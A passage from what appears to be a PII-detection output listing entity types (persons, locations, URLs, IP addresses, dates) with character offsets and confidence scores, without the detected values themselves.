0.85, type: PERSON, start: 53241, end: 53254, score: 0.85, type: PERSON, start: 53257, end: 53270, score: 0.85, type: PERSON, start: 53316, end: 53329, score: 0.85, type: LOCATION, start: 53370, end: 53378, score: 0.85, type: LOCATION, start: 53502, end: 53512, score: 0.85, type: LOCATION, start: 53815, end: 53825, score: 0.85, type: LOCATION, start: 54527, end: 54566, score: 0.85, type: LOCATION, start: 54567, end: 54575, score: 0.85, type: LOCATION, start: 54909, end: 54943, score: 0.85, type: PERSON, start: 55376, end: 55391, score: 0.85, type: DATE_TIME, start: 56693, end: 56707, score: 0.85, type: PERSON, start: 57134, end: 57140, score: 0.85, type: DATE_TIME, start: 57665, end: 57674, score: 0.85, type: LOCATION, start: 57732, end: 57751, score: 0.85, type: PERSON, start: 57933, end: 57946, score: 0.85, type: PERSON, start: 58126, end: 58149, score: 0.85, type: PERSON, start: 58592, end: 58605, score: 0.85, type: LOCATION, start: 59078, end: 59096, score: 0.85, type: PERSON, start: 59156, end: 59166, score: 0.85, type: PERSON, start: 59404, end: 59417, score: 0.85, type: PERSON, start: 59455, end: 59468, score: 0.85, type: PERSON, start: 59510, end: 59518, score: 0.85, type: PERSON, start: 59563, end: 59576, score: 0.85, type: PERSON, start: 60126, end: 60139, score: 0.85, type: URL, start: 60648, end: 60659, score: 0.85, type: LOCATION, start: 60960, end: 60969, score: 0.85, type: PERSON, start: 60972, end: 60985, score: 0.85, type: PERSON, start: 61460, end: 61473, score: 0.85, type: LOCATION, start: 62184, end: 62223, score: 0.85, type: LOCATION, start: 63105, end: 63113, score: 0.85, type: PERSON, start: 65854, end: 65867, score: 0.85, type: PERSON, start: 66265, end: 66277, score: 0.85, type: PERSON, start: 66339, end: 66352, score: 0.85, type: PERSON, start: 66416, end: 66429, score: 0.85, type: PERSON, start: 66686, end: 66704, score: 0.85, type: PERSON, start: 67038, end: 67050, score: 0.85, type: PERSON, start: 67200, end: 67213, score: 0.85, type: PERSON, start: 67370, end: 67388, score: 0.85, type: PERSON, start: 67658, end: 67670, score: 0.85, type: PERSON, start: 67779, end: 67791, score: 0.85, type: PERSON, start: 67878, end: 67891, score: 0.85, type: NRP, start: 68076, end: 68113, score: 0.85, type: PERSON, start: 68393, end: 68405, score: 0.85, type: PERSON, start: 68514, end: 68526, score: 0.85, type: URL, start: 68862, end: 68869, score: 0.85, type: URL, start: 68878, end: 68886, score: 0.85, type: URL, start: 68901, end: 68908, score: 0.85, type: PERSON, start: 70405, end: 70424, score: 0.85, type: LOCATION, start: 71098, end: 71137, score: 0.85, type: PERSON, start: 74077, end: 74090, score: 0.85, type: LOCATION, start: 74391, end: 74435, score: 0.85, type: LOCATION, start: 74436, end: 74444, score: 0.85, type: URL, start: 315, end: 357, score: 0.6, type: IP_ADDRESS, start: 5203, end: 5212, score: 0.6, type: IP_ADDRESS, start: 9907, end: 9916, score: 0.6, type: IP_ADDRESS, start: 10839, end: 10848, score: 0.6, type: IP_ADDRESS, start: 14591, end: 14600, score: 0.6, type: IP_ADDRESS, start: 17510, end: 17519, score: 0.6, type: IP_ADDRESS, start: 21117, end: 21126, score: 0.6, type: IP_ADDRESS, start: 24468, end: 24477, score: 0.6, type: IP_ADDRESS, start: 24801, end: 24810, score: 0.6, type: IP_ADDRESS, start: 27924, end: 27933, score: 0.6, type: IP_ADDRESS, start: 32058, end: 32067, score: 0.6, type: IP_ADDRESS, start: 32990, end: 32999, score: 0.6, type: IP_ADDRESS, start: 38915, end: 38924, score: 0.6, type: IP_ADDRESS, start: 38984, end: 38993, score: 0.6, type: IP_ADDRESS, start: 39269, end: 39278, score: 0.6, type: IP_ADDRESS, start: 39640, end: 39649, score: 0.6, type: IP_ADDRESS, start: 46646, end: 46655, score: 0.6, type: IP_ADDRESS, start: 59797, end: 59806, score: 0.6, type: IP_ADDRESS, start: 59884, end: 59893, score: 0.6, type: IP_ADDRESS, start: 60825, end: 60834, score: 0.6, type: IP_ADDRESS, start: 61863, end: 61872, score: 0.6, type: IP_ADDRESS, start: 61976, end: 61985, score: 0.6, type: IP_ADDRESS, start: 68835, end: 68844, score: 0.6, type: IP_ADDRESS, start: 74514, end: 74523, score: 0.6, type: IP_ADDRESS, start: 75019, end: 75028, score: 0.6, type: URL, start: 950, end: 960, score: 0.5, type: URL, start: 989, end: 999, score: 0.5, type: URL, start: 1032, end: 1042, score: 0.5, type: URL, start: 1068, end: 1078, score: 0.5, type: URL, start: 1101, end: 1111, score: 0.5, type: URL, start: 1134, end: 1144, score: 0.5, type: URL, start: 1182, end: 1191, score: 0.5, type: URL, start: 1224, end: 1233, score: 0.5, type: URL, start: 1276, end: 1293, score: 0.5, type: URL, start: 1324, end: 1341, score: 0.5, type: URL, start: 1381, end: 1398, score: 0.5, type: URL, start: 1472, end: 1487, score: 0.5, type: URL, start: 4405, end: 4412, score: 0.5, type: URL, start: 4570, end: 4577, score: 0.5, type: URL, start: 4736, end: 4746, score: 0.5, type: URL, start: 4826, end: 4833, score: 0.5, type: URL, start: 4842, end: 4852, score: 0.5, type: URL, start: 4879, end: 4886, score: 0.5, type: URL, start: 4977, end: 4984, score: 0.5, type: URL, start: 6020, end: 6027, score: 0.5, type: URL, start: 6029, end: 6035, score: 0.5, type: URL, start: 6067, end: 6074, score: 0.5, type: URL, start: 6082, end: 6087, score: 0.5, type: URL, start: 6117, end: 6124, score: 0.5, type: URL, start: 6131, end: 6140, score: 0.5, type: URL, start: 6184, end: 6191, score: 0.5, type: URL, start: 6229, end: 6236, score: 0.5, type: URL, start: 6239, end: 6252, score: 0.5, type: URL, start: 7130, end: 7142, score: 0.5, type: URL, start: 7192, end: 7204, score: 0.5, type: URL, start: 7262, end: 7269, score: 0.5, type: URL, start: 7324, end: 7331, score: 0.5, type: URL, start: 7393, end: 7405, score: 0.5, type: URL, start: 7451, end: 7463, score: 0.5, type: URL, start: 7526, end: 7538, score: 0.5, type: URL, start: 7707, end: 7719, score: 0.5, type: URL, start: 7771, end: 7783, score: 0.5, type: URL, start: 7835, end: 7842, score: 0.5, type: URL, start: 7910, end: 7922, score: 0.5, type: URL, start: 8034, end: 8041, score: 0.5, type: URL, start: 8093, end: 8100, score: 0.5, type: URL, start: 8163, end: 8175, score: 0.5, type: URL, start: 8238, end: 8246, score: 0.5, type: URL, start: 8416, end: 8423, score: 0.5, type: URL, start: 8456, end: 8463, score: 0.5, type: URL, start: 8595, end: 8602, score: 0.5, type: URL, start: 9667, end: 9674, score: 0.5, type: URL, start: 10188, end: 10195, score: 0.5, type: URL, start: 10206, end: 10218, score: 0.5, type: URL, start: 10265, end: 10273, score: 0.5, type: URL, start: 10458, end: 10465, score: 0.5, type: URL, start: 10621, end: 10628, score: 0.5, type: URL, start: 11728, end: 11735, score: 0.5, type: URL, start: 11737, end: 11743, score: 0.5, type: URL, start: 11775, end: 11782, score: 0.5, type: URL, start: 11790, end: 11795, score: 0.5, type: URL, start: 11825, end: 11832, score: 0.5, type: URL, start: 11839, end: 11848, score: 0.5, type: URL, start: 12086, end: 12093, score: 0.5, type: URL, start: 12143, end: 12150, score: 0.5, type: URL, start: 12153, end: 12166, score: 0.5, type: URL, start: 12375, end: 12387, score: 0.5, type: URL, start: 12437, end: 12449, score: 0.5, type: URL, start: 12507, end: 12514, score: 0.5, type: URL, start: 12569, end: 12576, score: 0.5, type: URL, start: 12638, end: 12650, score: 0.5, type: URL, start: 12696, end: 12708, score: 0.5, type: URL, start: 12771, end: 12783, score: 0.5, type: URL, start: 13189, end: 13201, score: 0.5, type: URL, start: 13253, end: 13265, score: 0.5, type: URL, start: 13317, end: 13329, score: 0.5, type: URL, start: 13387, end: 13399, score: 0.5, type: URL, start: 13520, end: 13527, score: 0.5, type: URL, start: 13595, end: 13607, score: 0.5, type: URL, start: 13719, end: 13726, score: 0.5, type: URL, start: 13789, end: 13801, score: 0.5, type: URL, start: 13863, end: 13871, score: 0.5, type: URL, start: 14075, end: 14082, score: 0.5, type: URL, start: 14115, end: 14122, score: 0.5, type: URL, start: 14151, end: 14158, score: 0.5, type: URL, start: 14210, end: 14217, score: 0.5, type: URL, start: 14388, end: 14395, score: 0.5, type: URL, start: 15361, end: 15368, score: 0.5, type: URL, start: 15370, end: 15376, score: 0.5, type: URL, start: 15408, end: 15415, score: 0.5, type: URL, start: 15423, end: 15428, score: 0.5, type: URL, start: 15458, end: 15465, score: 0.5, type: URL, start: 15472, end: 15481, score: 0.5, type: URL, start: 15525, end: 15532, score: 0.5, type: URL, start: 15570, end: 15577, score: 0.5, type: URL, start: 15580, end: 15593, score: 0.5, type: URL, start: 15652, end: 15664, score: 0.5, type: URL, start: 15714, end: 15726, score: 0.5, type: URL, start: 15784, end: 15791, score: 0.5, type: URL, start: 15846, end: 15853, score: 0.5, type: URL, start: 15915, end: 15927, score: 0.5, type: URL, start: 15973, end: 15985, score: 0.5, type: URL, start: 16048, end: 16060, score: 0.5, type: URL, start: 16468, end: 16480, score: 0.5, type: URL, start: 16532, end: 16539, score: 0.5, type: URL, start: 16607, end: 16614, score: 0.5, type: URL, start: 16666, end: 16673, score: 0.5, type: URL, start: 16736, end: 16748, score: 0.5, type: URL, start: 16810, end: 16818, score: 0.5, type: URL, start: 17236, end: 17243, score: 0.5, type: URL, start: 17276, end: 17283, score: 0.5, type: URL, start: 17301, end: 17308, score: 0.5, type: URL, start: 18377, end: 18384, score: 0.5, type: URL, start: 18386, end: 18392, score: 0.5, type: URL, start: 18424, end: 18431, score: 0.5, type: URL, start: 18439, end: 18444, score: 0.5, type: URL, start: 18474, end: 18481, score: 0.5, type: URL, start: 18488, end: 18497, score: 0.5, type: URL, start: 18541, end: 18548, score: 0.5, type: URL, start: 18586, end: 18593, score: 0.5, type: URL, start: 18596, end: 18609, score: 0.5, type: URL, start: 18818, end: 18830, score: 0.5, type: URL, start: 18880, end: 18892, score: 0.5, type: URL, start: 18950, end: 18957, score: 0.5, type: URL, start: 19012, end: 19019, score: 0.5, type: URL, start: 19081, end: 19093, score: 0.5, type: URL, start: 19139, end: 19151, score: 0.5, type: URL, start: 19214, end: 19226, score: 0.5, type: URL, start: 19634, end: 19646, score: 0.5, type: URL, start: 19698, end: 19710, score: 0.5, type: URL, start: 19762, end: 19774, score: 0.5, type: URL, start: 19831, end: 19838, score: 0.5, type: URL, start: 19906, end: 19918, score: 0.5, type: URL, start: 20030, end: 20042, score: 0.5, type: URL, start: 20215, end: 20222, score: 0.5, type: URL, start: 20274, end: 20281, score: 0.5, type: URL, start: 20344, end: 20356, score: 0.5, type: URL, start: 20418, end: 20426, score: 0.5, type: URL, start: 20844, end: 20851, score: 0.5, type: URL, start: 20884, end: 20891, score: 0.5, type: URL, start: 20909, end: 20916, score: 0.5, type: URL, start: 21981, end: 21988, score: 0.5, type: URL, start: 21990, end: 21996, score: 0.5, type: URL, start: 22028, end: 22035, score: 0.5, type: URL, start: 22043, end: 22048, score: 0.5, type: URL, start: 22078, end: 22085, score: 0.5, type: URL, start: 22092, end: 22101, score: 0.5, type: URL, start: 22145, end: 22152, score: 0.5, type: URL, start: 22190, end: 22197, score: 0.5, type: URL, start: 22200, end: 22213, score: 0.5, type: URL, start: 22422, end: 22429, score: 0.5, type: URL, start: 22478, end: 22490, score: 0.5, type: URL, start: 22540, end: 22552, score: 0.5, type: URL, start: 22610, end: 22617, score: 0.5, type: URL, start: 22672, end: 22679, score: 0.5, type: URL, start: 22741, end: 22753, score: 0.5, type: URL, start: 22799, end: 22811, score: 0.5, type: URL, start: 23220, end: 23232, score: 0.5, type: URL, start: 23284, end: 23296, score: 0.5, type: URL, start: 23348, end: 23360, score: 0.5, type: URL, start: 23417, end: 23424, score: 0.5, type: URL, start: 23492, end: 23504, score: 0.5, type: URL, start: 23616, end: 23623, score: 0.5, type: URL, start: 23675, end: 23682, score: 0.5, type: URL, start: 23745, end: 23757, score: 0.5, type: URL, start: 23819, end: 23827, score: 0.5, type: URL, start: 24039, end: 24046, score: 0.5, type: URL, start: 24079, end: 24086, score: 0.5, type: URL, start: 24104, end: 24111, score: 0.5, type: URL, start: 24128, end: 24135, score: 0.5, type: URL, start: 24147, end: 24154, score: 0.5, type: URL, start: 24168, end: 24175, score: 0.5, type: URL, start: 24235, end: 24242, score: 0.5, type: URL, start: 25379, end: 25386, score: 0.5, type: URL, start: 25388, end: 25394, score: 0.5, type: URL, start: 25426, end: 25433, score: 0.5, type: URL, start: 25441, end: 25446, score: 0.5, type: URL, start: 25476, end: 25483, score: 0.5, type: URL, start: 25490, end: 25499, score: 0.5, type: URL, start: 25543, end: 25550, score: 0.5, type: URL, start: 25588, end: 25595, score: 0.5, type: URL, start: 25598, end: 25611, score: 0.5, type: URL, start: 25810, end: 25824, score: 0.5, type: URL, start: 25888, end: 25900, score: 0.5, type: URL, start: 25950, end: 25962, score: 0.5, type: URL, start: 26020, end: 26027, score: 0.5, type: URL, start: 26082, end: 26089, score: 0.5, type: URL, start: 26151, end: 26163, score: 0.5, type: URL, start: 26209, end: 26221, score: 0.5, type: URL, start: 26839, end: 26851, score: 0.5, type: URL, start: 26903, end: 26915, score: 0.5, type: URL, start: 26974, end: 26981, score: 0.5, type: URL, start: 26987, end: 26994, score: 0.5, type: URL, start: 27042, end: 27049, score: 0.5, type: URL, start: 27117, end: 27124, score: 0.5, type: URL, start: 27176, end: 27183, score: 0.5, type: URL, start: 27246, end: 27258, score: 0.5, type: URL, start: 27320, end: 27328, score: 0.5, type: URL, start: 28369, end: 28376, score: 0.5, type: URL, start: 28378, end: 28384, score: 0.5, type: URL, start: 28416, end: 28423, score: 0.5, type: URL, start: 28430, end: 28439, score: 0.5, type: URL, start: 28470, end: 28476, score: 0.5, type: URL, start: 28528, end: 28540, score: 0.5, type: URL, start: 28598, end: 28605, score: 0.5, type: URL, start: 28660, end: 28667, score: 0.5, type: URL, start: 28729, end: 28741, score: 0.5, type: URL, start: 28787, end: 28794, score: 0.5, type: URL, start: 28856, end: 28863, score: 0.5, type: URL, start: 28926, end: 28938, score: 0.5, type: URL, start: 29000, end: 29008, score: 0.5, type: URL, start: 29134, end: 29141, score: 0.5, type: URL, start: 29174, end: 29181, score: 0.5, type: URL, start: 29199, end: 29206, score: 0.5, type: URL, start: 29275, end: 29282, score: 0.5, type: URL, start: 29432, end: 29439, score: 0.5, type: URL, start: 29476, end: 29483, score: 0.5, type: URL, start: 29494, end: 29506, score: 0.5, type: URL, start: 29543, end: 29551, score: 0.5, type: URL, start: 29587, end: 29594, score: 0.5, type: URL, start: 29612, end: 29619, score: 0.5, type: URL, start: 29635, end: 29642, score: 0.5, type: URL, start: 29653, end: 29658, score: 0.5, type: URL, start: 29840, end: 29845, score: 0.5, type: URL, start: 29872, end: 29879, score: 0.5, type: URL, start: 29890, end: 29902, score: 0.5, type: URL, start: 29939, end: 29947, score: 0.5, type: URL, start: 30004, end: 30011, score: 0.5, type: URL, start: 30029, end: 30034, score: 0.5, type: URL, start: 30050, end: 30057, score: 0.5, type: URL, start: 30068, end: 30073, score: 0.5, type: URL, start: 30465, end: 30470, score: 0.5, type: URL, start: 30496, end: 30504, score: 0.5, type: URL, start: 30565, end: 30570, score: 0.5, type: URL, start: 30609, end: 30616, score: 0.5, type: URL, start: 30759, end: 30766, score: 0.5, type: URL, start: 30803, end: 30811, score: 0.5, type: URL, start: 30851, end: 30858, score: 0.5, type: URL, start: 31029, end: 31036, score: 0.5, type: URL, start: 31173, end: 31181, score: 0.5, type: URL, start: 31220, end: 31227, score: 0.5, type: URL, start: 31427, end: 31434, score: 0.5, type: URL, start: 31490, end: 31497, score: 0.5, type: URL, start: 31562, end: 31569, score: 0.5, type: URL, start: 31633, end: 31640, score: 0.5, type: URL, start: 32126, end: 32133, score: 0.5, type: URL, start: 32221, end: 32228, score: 0.5, type: URL, start: 32513, end: 32522, score: 0.5, type: URL, start: 32563, end: 32572, score: 0.5, type: URL, start: 32619, end: 32625, score: 0.5, type: URL, start: 32673, end: 32680, score: 0.5, type: URL, start: 33522, end: 33529, score: 0.5, type: URL, start: 33688, end: 33698, score: 0.5, type: URL, start: 33778, end: 33785, score: 0.5, type: URL, start: 33794, end: 33804, score: 0.5, type: URL, start: 33831, end: 33838, score: 0.5, type: URL, start: 33929, end: 33936, score: 0.5, type: URL, start: 33976, end: 33983, score: 0.5, type: URL, start: 33985, end: 33991, score: 0.5, type: URL, start: 34023, end: 34030, score: 0.5, type: URL, start: 34038, end: 34043, score: 0.5, type: URL, start: 34086, end: 34093, score: 0.5, type: URL, start: 34145, end: 34157, score: 0.5, type: URL, start: 34207, end: 34219, score: 0.5, type: URL, start: 34277, end: 34284, score: 0.5, type: URL, start: 34339, end: 34346, score: 0.5, type: URL, start: 34408, end: 34415, score: 0.5, type: URL, start: 34915, end: 34922, score: 0.5, type: URL, start: 34985, end: 34997, score: 0.5, type: URL, start: 35038, end: 35045, score: 0.5, type: URL, start: 35071, end: 35079, score: 0.5, type: URL, start: 35286, end: 35293, score: 0.5, type: URL, start: 35326, end: 35333, score: 0.5, type: URL, start: 35478, end: 35489, score: 0.5, type: URL, start: 35692, end: 35697, score: 0.5, type: URL, start: 36143, end: 36147, score: 0.5, type: URL, start: 36160, end: 36167, score: 0.5, type: URL, start: 36556, end: 36560, score: 0.5, type: URL, start: 36573, end: 36580, score: 0.5, type: URL, start: 36716, end: 36727, score: 0.5, type: URL, start: 37069, end: 37073, score: 0.5, type: URL, start: 37086, end: 37093, score: 0.5, type: URL, start: 37230, end: 37241, score: 0.5, type: URL, start: 37552, end: 37556, score: 0.5, type: URL, start: 37569, end: 37576, score: 0.5, type: URL, start: 38021, end: 38025, score: 0.5, type: URL, start: 38038, end: 38045, score: 0.5, type: URL, start: 38459, end: 38463, score: 0.5, type: URL, start: 38476, end: 38483, score: 0.5, type: URL, start: 38536, end: 38543, score: 0.5, type: URL, start: 38548, end: 38555, score: 0.5, type: URL, start: 38713, end: 38721, score: 0.5, type: URL, start: 38773, end: 38780, score: 0.5, type: URL, start: 38789, end: 38797, score: 0.5, type: URL, start: 38812, end: 38819, score: 0.5, type: URL, start: 38969, end: 38977, score: 0.5, type: URL, start: 39025, end: 39032, score: 0.5, type: URL, start: 39066, end: 39073, score: 0.5, type: URL, start: 39116, end: 39123, score: 0.5, type: URL, start: 39322, end: 39328, score: 0.5, type: URL, start: 39388, end: 39395, score: 0.5, type: URL, start: 39404, end: 39412, score: 0.5, type: URL, start: 39451, end: 39457, score: 0.5, type: URL, start: 39504, end: 39511, score: 0.5, type: URL, start: 39690, end: 39695, score: 0.5, type: URL, start: 39723, end: 39730, score: 0.5, type: URL, start: 39741, end: 39753, score: 0.5, type: URL, start: 39800, end: 39808, score: 0.5, type: URL, start: 39844, end: 39849, score: 0.5, type: URL, start: 39865, end: 39872, score: 0.5, type: URL, start: 39895, end: 39902, score: 0.5, type: URL, start: 39913, end: 39918, score: 0.5, type: URL, start: 39953, end: 39960, score: 0.5, type: URL, start: 40110, end: 40120, score: 0.5, type: URL, start: 40148, end: 40156, score: 0.5, type: URL, start: 40179, end: 40186, score: 0.5, type: URL, start: 40199, end: 40207, score: 0.5, type: URL, start: 40239, end: 40246, score: 0.5, type: URL, start: 40259, end: 40267, score: 0.5, type: URL, start: 40303, end: 40313, score: 0.5, type: URL, start: 40341, end: 40349, score: 0.5, type: URL, start: 40372, end: 40379, score: 0.5, type: URL, start: 40392, end: 40400, score: 0.5, type: URL, start: 40432, end: 40439, score: 0.5, type: URL, start: 40452, end: 40460, score: 0.5, type: URL, start: 40496, end: 40506, score: 0.5, type: URL, start: 40535, end: 40543, score: 0.5, type: URL, start: 40567, end: 40574, score: 0.5, type: URL, start: 40587, end: 40595, score: 0.5, type: URL, start: 40627, end: 40634, score: 0.5, type: URL, start: 40647, end: 40655, score: 0.5, type: URL, start: 40691, end: 40701, score: 0.5, type: URL, start: 40734, end: 40742, score: 0.5, type: URL, start: 40770, end: 40777, score: 0.5, type: URL, start: 40790, end: 40798, score: 0.5, type: URL, start: 40830, end: 40837, score: 0.5, type: URL, start: 40850, end: 40858, score: 0.5, type: URL, start: 40934, end: 40947, score: 0.5, type: URL, start: 41037, end: 41045, score: 0.5, type: URL, start: 41067, end: 41074, score: 0.5, type: URL, start: 41086, end: 41093, score: 0.5, type: URL, start: 41187, end: 41200, score: 0.5, type: URL, start: 41306, end: 41314, score: 0.5, type: URL, start: 41336, end: 41343, score: 0.5, type: URL, start: 41355, end: 41362, score: 0.5, type: URL, start: 41452, end: 41465, score: 0.5, type: URL, start: 41495, end: 41503, score: 0.5, type: URL, start: 41525, end: 41532, score: 0.5, type: URL, start: 41544, end: 41551, score: 0.5, type: URL, start: 41637, end: 41650, score: 0.5, type: URL, start: 41706, end: 41713, score: 0.5, type: URL, start: 41724, end: 41736, score: 0.5, type: URL, start: 41783, end: 41791, score: 0.5, type: URL, start: 41814, end: 41821, score: 0.5, type: URL, start: 41891, end: 41904, score: 0.5, type: URL, start: 41957, end: 41964, score: 0.5, type: URL, start: 41975, end: 41987, score: 0.5, type: URL, start: 42034, end: 42042, score: 0.5, type: URL, start: 42065, end: 42072, score: 0.5, type: URL, start: 42079, end: 42086, score: 0.5, type: URL, start: 42282, end: 42289, score: 0.5, type: URL, start: 42325, end: 42332, score: 0.5, type: URL, start: 42445, end: 42452, score: 0.5, type: URL, start: 42477, end: 42484, score: 0.5, type: URL, start: 42551, end: 42558, score: 0.5, type: URL, start: 42595, end: 42602, score: 0.5, type: URL, start: 42615, end: 42622, score: 0.5, type: URL, start: 42695, end: 42702, score: 0.5, type: URL, start: 42711, end: 42718, score: 0.5, type: URL, start: 42725, end: 42731, score: 0.5, type: URL, start: 42745, end: 42752, score: 0.5, type: URL, start: 42761, end: 42768, score: 0.5, type: URL, start: 42775, end: 42781, score: 0.5, type: URL, start: 42793, end: 42800, score: 0.5, type: URL, start: 42812, end: 42819, score: 0.5, type: URL, start: 42892, end: 42899, score: 0.5, type: URL, start: 42907, end: 42914, score: 0.5, type: URL, start: 42920, end: 42926, score: 0.5, type: URL, start: 42940, end: 42947, score: 0.5, type: URL, start: 42956, end: 42963, score: 0.5, type: URL, start: 42969, end: 42975, score: 0.5, type: URL, start: 42987, end: 42994, score: 0.5, type: URL, start: 43010, end: 43017, score: 0.5, type: URL, start: 43096, end: 43103, score: 0.5, type: URL, start: 43115, end: 43122, score: 0.5, type: URL, start: 43132, end: 43138, score: 0.5, type: URL, start: 43152, end: 43159, score: 0.5, type: URL, start: 43168, end: 43175, score: 0.5, type: URL, start: 43185, end: 43191, score: 0.5, type: URL, start: 43203, end: 43210, score: 0.5, type: URL, start: 43213, end: 43218, score: 0.5, type: URL, start: 43301, end: 43308, score: 0.5, type: URL, start: 43364, end: 43371, score: 0.5, type: URL, start: 43374, end: 43380, score: 0.5, type: URL, start: 43407, end: 43414, score: 0.5, type: URL, start: 43425, end: 43437, score: 0.5, type: URL, start: 43504, end: 43511, score: 0.5, type: URL, start: 43514, end: 43521, score: 0.5, type: URL, start: 43636, end: 43643, score: 0.5, type: URL, start: 43674, end: 43681, score: 0.5, type: URL, start: 43684, end: 43690, score: 0.5, type: URL, start: 43712, end: 43719, score: 0.5, type: URL, start: 43736, end: 43743, score: 0.5, type: URL, start: 43746, end: 43751, score: 0.5, type: URL, start: 43773, end: 43780, score: 0.5, type: URL, start: 43783, end: 43790, score: 0.5, type: URL, start: 43920, end: 43927, score: 0.5, type: URL, start: 44132, end: 44139, score: 0.5, type: URL, start: 44142, end: 44148, score: 0.5, type: URL, start: 44197, end: 44204, score: 0.5, type: URL, start: 44207, end: 44214, score: 0.5, type: URL, start: 44241, end: 44248, score: 0.5, type: URL, start: 44276, end: 44283, score: 0.5, type: URL, start: 44294, end: 44306, score: 0.5, type: URL, start: 44373, end: 44380, score: 0.5, type: URL, start: 44383, end: 44390, score: 0.5, type: URL, start: 44505, end: 44512, score: 0.5, type: URL, start: 44543, end: 44550, score: 0.5, type: URL, start: 44560, end: 44567, score: 0.5, type: URL, start: 44570, end: 44576, score: 0.5, type: URL, start: 44605, end: 44612, score: 0.5, type: URL, start: 44615, end: 44620, score: 0.5, type: URL, start: 44642, end: 44649, score: 0.5, type: URL, start: 44652, end: 44659, score: 0.5, type: URL, start: 44789, end: 44796, score: 0.5, type: URL, start: 45190, end: 45197, score: 0.5, type: URL, start: 45200, end: 45205, score: 0.5, type: URL, start: 45368, end: 45375, score: 0.5, type: URL, start: 45378, end: 45384, score: 0.5, type: URL, start: 45439, end: 45446, score: 0.5, type: URL, start: 45478, end: 45485, score: 0.5, type: URL, start: 45517, end: 45524, score: 0.5, type: URL, start: 45552, end: 45559, score: 0.5, type: URL, start: 45570, end: 45582, score: 0.5, type: URL, start: 45649, end: 45656, score: 0.5, type: URL, start: 45659, end: 45666, score: 0.5, type: URL, start: 45771, end: 45778, score: 0.5, type: URL, start: 45809, end: 45816, score: 0.5, type: URL, start: 45826, end: 45833, score: 0.5, type: URL, start: 45836, end: 45842, score: 0.5, type: URL, start: 45871, end: 45878, score: 0.5, type: URL, start: 45881, end: 45886, score: 0.5, type: URL, start: 45908, end: 45915, score: 0.5, type: URL, start: 45918, end: 45925, score: 0.5, type: URL, start: 46050, end: 46057, score: 0.5, type: URL, start: 46221, end: 46228, score: 0.5, type: URL, start: 46697, end: 46704, score: 0.5, type: URL, start: 46707, end: 46712, score: 0.5, type: URL, start: 46879, end: 46886, score: 0.5, type: URL, start: 46889, end: 46895, score: 0.5, type: URL, start: 46950, end: 46957, score: 0.5, type: URL, start: 46989, end: 46996, score: 0.5, type: URL, start: 47028, end: 47035, score: 0.5, type: URL, start: 47065, end: 47072, score: 0.5, type: URL, start: 47083, end: 47095, score: 0.5, type: URL, start: 47162, end: 47169, score: 0.5, type: URL, start: 47172, end: 47179, score: 0.5, type: URL, start: 47294, end: 47301, score: 0.5, type: URL, start: 47550, end: 47557, score: 0.5, type: URL, start: 47560, end: 47565, score: 0.5, type: URL, start: 47587, end: 47594, score: 0.5, type: URL, start: 47597, end: 47604, score: 0.5, type: URL, start: 48145, end: 48152, score: 0.5, type: URL, start: 48175, end: 48182, score: 0.5, type: URL, start: 48260, end: 48267, score: 0.5, type: URL, start: 48292, end: 48299, score: 0.5, type: URL, start: 48351, end: 48358, score: 0.5, type: URL, start: 48510, end: 48516, score: 0.5, type: URL, start: 48550, end: 48558, score: 0.5, type: URL, start: 48572, end: 48579, score: 0.5, type: URL, start: 48582, end: 48589, score: 0.5, type: URL, start: 48659, end: 48666, score: 0.5, type: URL, start: 48996, end: 49003, score: 0.5, type: URL, start: 49059, end: 49066, score: 0.5, type: URL, start: 49216, end: 49223, score: 0.5, type: URL, start: 49324, end: 49330, score: 0.5, type: URL, start: 49931, end: 49938, score: 0.5, type: URL, start: 49985, end: 49991, score: 0.5, type: URL, start: 50025, end: 50033, score: 0.5, type: URL, start: 50047, end: 50054, score: 0.5, type: URL, start: 50057, end: 50064, score: 0.5, type: URL, start: 50134, end: 50141, score: 0.5, type: URL, start: 50178, end: 50185, score: 0.5, type: URL, start: 50246, end: 50252, score: 0.5, type: URL, start: 50285, end: 50292, score: 0.5, type: URL, start: 50348, end: 50355, score: 0.5, type: URL, start: 50541, end: 50548, score: 0.5, type: URL, start: 50571, end: 50578, score: 0.5, type: URL, start: 50707, end: 50712, score: 0.5, type: URL, start: 50754, end: 50761, score: 0.5, type: URL, start: 50961, end: 50968, score: 0.5, type: URL, start: 51197, end: 51205, score: 0.5, type: URL, start: 51225, end: 51232, score: 0.5, type: URL, start: 51235, end: 51242, score: 0.5, type: URL, start: 51264, end: 51271, score: 0.5, type: URL, start: 51310, end: 51317, score: 0.5, type: URL, start: 51331, end: 51336, score: 0.5, type: URL, start: 51436, end: 51441, score: 0.5, type: URL, start: 51453, end: 51469, score: 0.5, type: URL, start: 51514, end: 51521, score: 0.5, type: URL, start: 51687, end: 51694, score: 0.5, type: URL, start: 51705, end: 51721, score: 0.5, type: URL, start: 51767, end: 51775, score: 0.5, type: URL, start: 51822, end: 51829, score: 0.5, type: URL, start: 51858, end: 51865, score: 0.5, type: URL, start: 51887, end: 51894, score: 0.5, type: URL, start: 52008, end: 52015, score: 0.5, type: URL, start: 52027, end: 52043, score: 0.5, type: URL, start: 52088, end: 52095, score: 0.5, type: URL, start: 52261, end: 52268, score: 0.5, type: URL, start: 52279, end: 52295, score: 0.5, type: URL, start: 52341, end: 52349, score: 0.5, type: URL, start: 52396, end: 52403, score: 0.5, type: URL, start: 52432, end: 52439, score: 0.5, type: URL, start: 52461, end: 52468, score: 0.5, type: URL, start: 52506, end: 52513, score: 0.5, type: URL, start: 52528, end: 52533, score: 0.5, type: URL, start: 52542, end: 52549, score: 0.5, type: URL, start: 52741, end: 52748, score: 0.5, type: URL, start: 52771, end: 52778, score: 0.5, type: URL, start: 52895, end: 52902, score: 0.5, type: URL, start: 52951, end: 52958, score: 0.5, type: URL, start: 52984, end: 52991, score: 0.5, type: URL, start: 53079, end: 53087, score: 0.5, type: URL, start: 53104, end: 53111, score: 0.5, type: URL, start: 53127, end: 53134, score: 0.5, type: URL, start: 53167, end: 53174, score: 0.5, type: URL, start: 53214, end: 53221, score: 0.5, type: URL, start: 53273, end: 53280, score: 0.5, type: URL, start: 53542, end: 53550, score: 0.5, type: URL, start: 53576, end: 53584, score: 0.5, type: URL, start: 53683, end: 53688, score: 0.5, type: URL, start: 53732, end: 53739, score: 0.5, type: URL, start: 53754, end: 53759, score: 0.5, type: URL, start: 53855, end: 53863, score: 0.5, type: URL, start: 53889, end: 53897, score: 0.5, type: URL, start: 53998, end: 54003, score: 0.5, type: URL, start: 54060, end: 54067, score: 0.5, type: URL, start: 54082, end: 54087, score: 0.5, type: URL, start: 54096, end: 54103, score: 0.5, type: URL, start: 54157, end: 54164, score: 0.5, type: URL, 